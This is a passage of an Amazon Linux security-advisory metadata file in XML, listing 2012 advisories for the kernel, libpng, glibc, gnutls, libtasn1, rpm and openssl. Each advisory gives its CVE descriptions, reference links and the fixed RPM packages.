arch="x86_64"><filename>Packages/systemtap-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-server" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-server-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-initscript" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-initscript-1.6-5.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-55</id><title>Amazon Linux - ALAS-2012-55: medium priority package update for kernel</title><issued date="2012-03-16 10:53:00" /><updated date="2014-09-14 15:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0207:
* A divide-by-zero flaw was found in the Linux kernel's igmp_heard_query() function. An attacker able to send certain IGMP (Internet Group Management Protocol) packets to a target system could use this flaw to cause a denial of service.
CVE-2012-0045:
* A flaw was found in the way the Linux kernel's KVM hypervisor implementation emulated the syscall instruction for 32-bit guests. An unprivileged guest user could trigger this flaw to crash the guest.
CVE-2012-0038:
* A flaw was found in the way the Linux kernel's XFS file system implementation handled on-disk Access Control Lists (ACLs). A local, unprivileged user could use this flaw to cause a denial of service or escalate their privileges by mounting a specially-crafted disk.
CVE-2011-4622:
The create_pit_timer function in arch/x86/kvm/i8254.c in KVM 83, and possibly other versions, does not properly handle when Programmable Interval Timer (PIT) interrupt requests (IRQs) when a virtual interrupt controller (irqchip) is not available, which allows local users to cause a denial of service (NULL pointer dereference) by starting a timer.
A flaw was found in the way the KVM subsystem of a Linux kernel handled PIT (Programmable Interval Timer) IRQs (interrupt requests) when there was no virtual interrupt controller set up. A malicious user in the kvm group on the host could force this situation to occur, resulting in the host crashing.
* A flaw was found in the way the KVM subsystem of a Linux kernel handled PIT (Programmable Interval Timer) IRQs (interrupt requests) when there was no virtual interrupt controller set up. A local, unprivileged user on the host could force this situation to occur, resulting in the host crashing.
CVE-2011-4611:
* The RHSA-2011:1530 kernel update introduced an integer overflow flaw in the Linux kernel. On PowerPC systems, a local, unprivileged user could use this flaw to cause a denial of service.
CVE-2011-4594:
* Two flaws were found in the way the Linux kernel's __sys_sendmsg() function, when invoked via the sendmmsg() system call, accessed user-space memory. A local, unprivileged user could use these flaws to cause a denial of service.
CVE-2011-4347:
It was found that the kvm_vm_ioctl_assign_device() function in the KVM subsystem of a Linux kernel did not check if the user requesting device assignment was privileged or not. A member of the kvm group on the host could assign unused PCI devices, or even devices that were in use and whose resources were not properly claimed by the respective drivers, which could result in the host crashing.
* It was found that the kvm_vm_ioctl_assign_device() function in the KVM (Kernel-based Virtual Machine) subsystem of a Linux kernel did not check if the user requesting device assignment was privileged or not. A local, unprivileged user on the host could assign unused PCI devices, or even devices that were in use and whose resources were not properly claimed by the respective drivers, which could result in the host crashing.
CVE-2011-4132:
* A flaw was found in the Linux kernel's Journaling Block Device (JBD). A local, unprivileged user could use this flaw to crash the system by mounting a specially-crafted ext3 or ext4 disk.
* A flaw was found in the Linux kernel's Journaling Block Device (JBD). A local attacker could use this flaw to crash the system by mounting a specially-crafted ext3 or ext4 disk.
CVE-2011-4081:
* Flaws in ghash_update() and ghash_final() could allow a local, unprivileged user to cause a denial of service.
CVE-2011-4077:
* A buffer overflow flaw was found in the way the Linux kernel's XFS file system implementation handled links with overly long path names. A local, unprivileged user could use this flaw to cause a denial of service or escalate their privileges by mounting a specially-crafted disk.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4077" title="" id="CVE-2011-4077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4081" title="" id="CVE-2011-4081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4132" title="" id="CVE-2011-4132" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4347" title="" id="CVE-2011-4347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4594" title="" id="CVE-2011-4594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4611" title="" id="CVE-2011-4611" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4622" title="" id="CVE-2011-4622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0038" title="" id="CVE-2012-0038" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0045" title="" id="CVE-2012-0045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0207" title="" id="CVE-2012-0207" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0350.html" title="" id="RHSA-2012:0350" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-107.1.39.amzn1.noarch.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-56</id><title>Amazon Linux - ALAS-2012-56: medium priority package update for libpng</title><issued date="2012-03-23 14:13:00" /><updated date="2014-09-14 15:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3045:
Integer signedness error in pngrutil.c in libpng before 1.4.10beta01, as used in Google Chrome before 17.0.963.83 and other products, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PNG file, a different vulnerability than CVE-2011-3026.
A heap-based buffer overflow flaw was found in the way libpng processed compressed chunks in PNG image files. An attacker could create a specially-crafted PNG image file that, when opened, could cause an application using libpng to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3045" title="" id="CVE-2011-3045" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0407.html" title="" id="RHSA-2012:0407" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libpng-debuginfo" version="1.2.48" release="1.11.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.48-1.11.amzn1.i686.rpm</filename></package><package name="libpng-devel" version="1.2.48" release="1.11.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.48-1.11.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.48" release="1.11.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.48-1.11.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.48" release="1.11.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.48-1.11.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.48" release="1.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.48-1.11.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.48" release="1.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.48-1.11.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.48" release="1.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.48-1.11.amzn1.x86_64.rpm</filename></package><package name="libpng-debuginfo" version="1.2.48" release="1.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.48-1.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-57</id><title>Amazon Linux - ALAS-2012-57: medium priority package update for glibc</title><issued date="2012-03-23 14:15:00" /><updated date="2014-09-14 15:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0864:
An integer overflow flaw was found in the implementation of the printf functions family. This could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0864" title="" id="CVE-2012-0864" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0393.html" title="" id="RHSA-2012:0393" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="glibc-static" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.47.37.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-58</id><title>Amazon Linux - ALAS-2012-58: medium priority package update for kernel</title><issued date="2012-03-23 14:18:00" /><updated date="2014-09-14 15:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1568:
804947:
CVE-2012-1568 kernel: execshield: predictable ascii armour base address
* It was found that when running a 32-bit binary that uses a large number of shared libraries, one of the libraries would always be loaded at a predictable address in memory. An attacker could use this flaw to bypass the Address Space Layout Randomization (ASLR) security feature.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1568" title="" id="CVE-2012-1568" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.12-3.2.4.amzn1.noarch.rpm</filename></package><package name="kernel-devel" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-59</id><title>Amazon Linux - ALAS-2012-59: important priority package update for gnutls</title><issued date="2012-04-05 12:47:00" /><updated date="2014-09-14 15:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1573:
gnutls_cipher.c in libgnutls in GnuTLS before 2.12.17 and 3.x before 3.0.15 does not properly handle data encrypted with a block cipher, which allows remote attackers to cause a denial of service (heap memory corruption and application crash) via a crafted record, as demonstrated by a crafted GenericBlockCipher structure.
A flaw was found in the way GnuTLS decrypted malformed TLS records. This could cause a TLS/SSL client or server to crash when processing a specially-crafted TLS record from a remote TLS/SSL connection peer.
CVE-2011-4128:
Buffer overflow in the gnutls_session_get_data function in lib/gnutls_session.c in GnuTLS 2.12.x before 2.12.14 and 3.x before 3.0.7, when used on a client that performs nonstandard session resumption, allows remote TLS servers to cause a denial of service (application crash) via a large SessionTicket.
A boundary error was found in the gnutls_session_get_data() function. A malicious TLS/SSL server could use this flaw to crash a TLS/SSL client or, possibly, execute arbitrary code as the client, if the client passed a fixed-sized buffer to gnutls_session_get_data() before checking the real size of the session data provided by the server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4128" title="" id="CVE-2011-4128" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1573" title="" id="CVE-2012-1573" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0429.html" title="" id="RHSA-2012:0429" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="gnutls-debuginfo" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-4.6.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-4.6.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-4.6.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-4.6.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-4.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-60</id><title>Amazon Linux - ALAS-2012-60: important priority package update for libtasn1</title><issued date="2012-04-05 12:48:00" /><updated date="2014-09-14 15:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1569:
The asn1_get_length_der function in decoding.c in GNU Libtasn1 before 2.12, as used in GnuTLS before 3.0.16 and other products, does not properly handle certain large length values, which allows remote attackers to cause a denial of service (heap memory corruption and application crash) or possibly have unspecified other impact via a crafted ASN.1 structure.
A flaw was found in the way libtasn1 decoded DER data. An attacker could create carefully-crafted DER encoded input (such as an X.509 certificate) that, when parsed by an application that uses libtasn1 (such as applications using GnuTLS), could cause the application to crash.
A flaw was found in the way libtasn1 decoded DER data. An attacker could create a carefully-crafted X.509 certificate that, when parsed by an application that uses GnuTLS, could cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1569" title="" id="CVE-2012-1569" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0427.html" title="" id="RHSA-2012:0427" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libtasn1-tools" version="2.3" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-tools-2.3-3.4.amzn1.i686.rpm</filename></package><package name="libtasn1-debuginfo" version="2.3" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-debuginfo-2.3-3.4.amzn1.i686.rpm</filename></package><package name="libtasn1" version="2.3" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-2.3-3.4.amzn1.i686.rpm</filename></package><package name="libtasn1-devel" version="2.3" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-devel-2.3-3.4.amzn1.i686.rpm</filename></package><package name="libtasn1-debuginfo" version="2.3" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-debuginfo-2.3-3.4.amzn1.x86_64.rpm</filename></package><package name="libtasn1-tools" version="2.3" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-tools-2.3-3.4.amzn1.x86_64.rpm</filename></package><package name="libtasn1" version="2.3" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-2.3-3.4.amzn1.x86_64.rpm</filename></package><package name="libtasn1-devel" version="2.3" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-devel-2.3-3.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-61</id><title>Amazon Linux - ALAS-2012-61: important priority package update for rpm</title><issued date="2012-04-05 12:49:00" /><updated date="2014-09-14 15:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0060:
Multiple flaws were found in the way RPM parsed package file headers. An attacker could create a specially-crafted RPM package that, when its package header was accessed, or during package signature verification, could cause an application using the RPM library (such as the rpm command line tool, or the yum and up2date package managers) to crash or, potentially, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0060" title="" id="CVE-2012-0060" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0451.html" title="" id="RHSA-2012:0451" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="rpm-python" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-build" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-cron" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-cron-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-apidocs" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-apidocs-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-libs" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-libs-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-devel" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-devel-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-debuginfo" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-debuginfo-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-python" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-debuginfo" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-debuginfo-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-devel" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-devel-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-cron" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-cron-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-build" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-apidocs" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-apidocs-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-libs" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-libs-4.8.0-19.38.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-62</id><title>Amazon Linux - ALAS-2012-62: medium priority package update for openssl</title><issued date="2012-04-05 12:49:00" /><updated date="2014-09-14 15:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1165:
The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before 0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message, a different vulnerability than CVE-2006-7250.
A NULL pointer dereference flaw was found in the way OpenSSL parsed Secure/Multipurpose Internet Mail Extensions (S/MIME) messages. An attacker could use this flaw to crash an application that uses OpenSSL to decrypt or verify S/MIME messages.
CVE-2012-0884:
The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict certain oracle behavior, which makes it easier for context-dependent attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen ciphertext attack.
A flaw was found in the PKCS#7 and Cryptographic Message Syntax (CMS) implementations in OpenSSL. An attacker could possibly use this flaw to perform a Bleichenbacher attack to decrypt an encrypted CMS, PKCS#7, or S/MIME message by sending a large number of chosen ciphertext messages to a service using OpenSSL and measuring error response times.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0884" title="" id="CVE-2012-0884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1165" title="" id="CVE-2012-1165" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0426.html" title="" id="RHSA-2012:0426" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl-devel" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 